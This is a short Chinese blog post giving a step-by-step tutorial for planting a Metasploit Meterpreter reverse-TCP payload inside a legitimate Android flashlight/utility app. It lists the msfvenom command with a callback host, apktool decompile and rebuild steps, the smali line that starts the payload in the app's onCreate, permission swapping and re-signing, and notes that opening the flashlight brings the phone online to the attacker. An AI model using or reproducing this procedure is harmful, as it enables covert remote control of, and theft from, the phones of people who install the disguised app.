加载中
297 字
1 分钟
简单的一次手机APK注入

一、MSF

msfvenom -p android/meterpreter_reverse_tcp LHOST=10.1.239.156 LPORT=5555 > exp.apk
msfconsole

二、注入木马

1、安装超级瑞士刀

https://www.wandoujia.com/apps/107907

2、反编译

apktool d cjrsd.apk

3、找到配置文件

AndroidManifest.xml

4、找到主文件

这里其实是手电筒功能的启动程序
android:launchMode="singleTask" android:name="com.utooo.ssknife.torch.TorchActivity"
找到TorchActivity.smali文件

5、找到onCreate函数

.method protected onCreate(Landroid/os/Bundle;)V

6、找到启动接口invoke-super

invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

木马的接口可以任意选择,这里选择的是在onStartCommand中,这里是手电筒的启动程序

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

7、将木马的接口写入下一行,格式化写入

8、将木马apk的metasploit文件夹复制到正常apk的com目录下

9、更改权限

将AndroidManifest.xml中的permssion配置项替换为木马apk的权限配置项

10

10、重新编译即可

apktool b cjrsd.apk

11

11、签名

此时还不能安装,用MT文件管理器添加签名即可使用,打开手电筒功能上线,不过使用的不是原有签名,就像很多盗版软件安装时会出现签名不一致无法覆盖安装
12

12、上线

由于功能是手电筒的启动程序,打开手电筒成功上线。

13

14

接下来就应该熟悉了 :)
简单的一次手机APK注入
/posts/2023/08/android-apk-injection/
作者
dacj4n
发布于
2023-08-23
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时